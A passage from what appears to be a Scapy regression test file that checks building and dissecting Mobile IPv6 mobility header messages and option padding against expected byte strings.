==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x01\x03\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x02\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x01\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptReplayProtection()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptReplayProtection()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptCGAParamsReq += Mobility Options - Automatic Padding - MIP6OptCGAParamsReq +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCGAParamsReq()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0b\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCGAParamsReq()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0b\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCGAParamsReq()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0b\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0b\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0b\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0b\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0b\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0b\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0b\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptCGAParams += Mobility Options - Automatic Padding - MIP6OptCGAParams +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCGAParams()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0c\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCGAParams()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0c\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCGAParams()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0c\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0c\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0c\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0c\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0c\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0c\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0c\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptSignature += Mobility Options - Automatic Padding - MIP6OptSignature +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptSignature()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\r\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptSignature()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\r\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptSignature()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\r\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\r\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\r\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\r\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\r\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\r\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\r\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptHomeKeygenToken += Mobility Options - Automatic Padding - MIP6OptHomeKeygenToken +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptHomeKeygenToken()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0e\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptHomeKeygenToken()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0e\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptHomeKeygenToken()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0e\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0e\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0e\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0e\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0e\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0e\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0e\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptCareOfTestInit += Mobility Options - Automatic Padding - MIP6OptCareOfTestInit +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCareOfTestInit()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0f\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCareOfTestInit()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0f\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCareOfTestInit()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0f\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0f\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0f\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0f\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0f\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0f\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptCareOfTest += Mobility Options - Automatic Padding - MIP6OptCareOfTest +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCareOfTest()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCareOfTest()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCareOfTest()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Binding Refresh Request Message += MIP6MH_BRR - Build (default values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_BRR()) == b'`\x00\x00\x00\x00\x08\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x00\x00\x00h\xfb\x00\x00' + += MIP6MH_BRR - Build with specific values +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_BRR(nh=0xff, res=0xee, res2=0xaaaa, options=[MIP6OptLLAddr(), MIP6OptAltCoA()])) == b'`\x00\x00\x00\x00(\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xff\x04\x00\xee\xec$\xaa\xaa\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += MIP6MH_BRR - Basic dissection +a=IPv6(b'`\x00\x00\x00\x00\x08\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x00\x00\x00h\xfb\x00\x00') +b=a.payload +a.nh == 135 and isinstance(b, MIP6MH_BRR) and b.nh == 59 and b.len == 0 and b.mhtype == 0 and b.res == 0 and b.cksum == 0x68fb and b.res2 == 0 and b.options == [] + += MIP6MH_BRR - Dissection with specific values +a=IPv6(b'`\x00\x00\x00\x00(\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xff\x04\x00\xee\xec$\xaa\xaa\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +b=a.payload +a.nh == 135 and isinstance(b, MIP6MH_BRR) and b.nh == 0xff and b.len == 4 and b.mhtype == 0 and b.res == 238 and b.cksum == 0xec24 and b.res2 == 43690 and len(b.options) == 3 and isinstance(b.options[0], MIP6OptLLAddr) and isinstance(b.options[1], PadN) and isinstance(b.options[2], MIP6OptAltCoA) + += MIP6MH_BRR / MIP6MH_BU / MIP6MH_BA hashret() and answers() +hoa="2001:db8:9999::1" +coa="2001:db8:7777::1" +cn="2001:db8:8888::1" +ha="2001db8:6666::1" +a=IPv6(raw(IPv6(src=cn, dst=hoa)/MIP6MH_BRR())) +b=IPv6(raw(IPv6(src=coa, dst=cn)/IPv6ExtHdrDestOpt(options=HAO(hoa=hoa))/MIP6MH_BU(flags=0x01))) +b2=IPv6(raw(IPv6(src=coa, dst=cn)/IPv6ExtHdrDestOpt(options=HAO(hoa=hoa))/MIP6MH_BU(flags=~0x01))) +c=IPv6(raw(IPv6(src=cn, dst=coa)/IPv6ExtHdrRouting(type=2, addresses=[hoa])/MIP6MH_BA())) +b.answers(a) and not a.answers(b) and c.answers(b) and not b.answers(c) and not c.answers(b2) + +len(b[IPv6ExtHdrDestOpt].options) == 2 + + +############ +############ ++ Home Test Init Message + += MIP6MH_HoTI - Build (default values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoTI()) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01\x00g\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += MIP6MH_HoTI - Dissection (default values) +a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01\x00g\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +b = a.payload +a.nh == 135 and isinstance(b, MIP6MH_HoTI) and b.nh==59 and b.mhtype == 1 and b.len== 1 and b.res == 0 and b.cksum == 0x67f2 and b.cookie == b'\x00'*8 + + += MIP6MH_HoTI - Build (specific values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoTI(res=0x77, cksum=0x8899, cookie=b"\xAA"*8)) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' + += MIP6MH_HoTI - Dissection (specific values) +a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa') +b=a.payload +a.nh == 135 and isinstance(b, MIP6MH_HoTI) and b.nh==59 and b.mhtype == 1 and b.len == 1 and b.res == 0x77 and b.cksum == 0x8899 and b.cookie == b'\xAA'*8 + + +############ +############ ++ Care-of Test Init Message + += MIP6MH_CoTI - Build (default values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoTI()) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02\x00f\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += MIP6MH_CoTI - Dissection (default values) +a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02\x00f\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +b = a.payload +a.nh == 135 and isinstance(b, MIP6MH_CoTI) and b.nh==59 and b.mhtype == 2 and b.len== 1 and b.res == 0 and b.cksum == 0x66f2 and b.cookie == b'\x00'*8 + += MIP6MH_CoTI - Build (specific values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoTI(res=0x77, cksum=0x8899, cookie=b"\xAA"*8)) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' + += MIP6MH_CoTI - Dissection (specific values) +a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa') +b=a.payload +a.nh == 135 and isinstance(b, MIP6MH_CoTI) and b.nh==59 and b.mhtype == 2 and b.len == 1 and b.res == 0x77 and b.cksum == 0x8899 and b.cookie == b'\xAA'*8 + + +############ +############ ++ Home Test Message + += MIP6MH_HoT - Build (default values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoT()) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03\x00e\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += MIP6MH_HoT - Dissection (default values) +a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03\x00e\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +b = a.payload +a.nh == 135 and isinstance(b, MIP6MH_HoT) and b.nh==59 and b.mhtype == 3 and b.len== 2 and b.res == 0 and b.cksum == 0x65e9 and b.index == 0 and b.cookie == b'\x00'*8 and b.token == b'\x00'*8 + += MIP6MH_HoT - Build (specific values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoT(res=0x77, cksum=0x8899, cookie=b"\xAA"*8, index=0xAABB, token=b'\xCC'*8)) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc' + += MIP6MH_HoT - Dissection (specific values) +a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x03w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc') +b = a.payload +a.nh == 135 and isinstance(b, MIP6MH_HoT) and b.nh==59 and b.mhtype == 3 and b.len== 2 and b.res == 0x77 and b.cksum == 0x8899 and b.index == 0xAABB and b.cookie == b'\xAA'*8 and b.token == b'\xCC'*8 + += MIP6MH_HoT answers +a1, a2 = "2001:db8::1", "2001:db8::2" +cookie = RandString(8)._fix() +p1 = IPv6(src=a1, dst=a2)/MIP6MH_HoTI(cookie=cookie) +p2 = IPv6(src=a2, dst=a1)/MIP6MH_HoT(cookie=cookie) +p2_ko = IPv6(src=a2, dst=a1)/MIP6MH_HoT(cookie="".join(chr((orb(b'\xff') + 1) % 256))) +assert p1.hashret() == p2.hashret() and p2.answers(p1) and not p1.answers(p2) +assert p1.hashret() != p2_ko.hashret() and not p2_ko.answers(p1) and not p1.answers(p2_ko) + + +############ +############ ++ Care-of Test Message + += MIP6MH_CoT - Build (default values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoT()) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04\x00d\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += MIP6MH_CoT - Dissection (default values) +a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04\x00d\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +b = a.payload +a.nh == 135 and isinstance(b, MIP6MH_HoT) and b.nh==59 and b.mhtype == 4 and b.len== 2 and b.res == 0 and b.cksum == 0x64e9 and b.index == 0 and b.cookie == b'\x00'*8 and b.token == b'\x00'*8 + += MIP6MH_CoT - Build (specific values) +raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoT(res=0x77, cksum=0x8899, cookie=b"\xAA"*8, index=0xAABB, token=b'\xCC'*8)) == b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc' + += MIP6MH_CoT - Dissection (specific values) 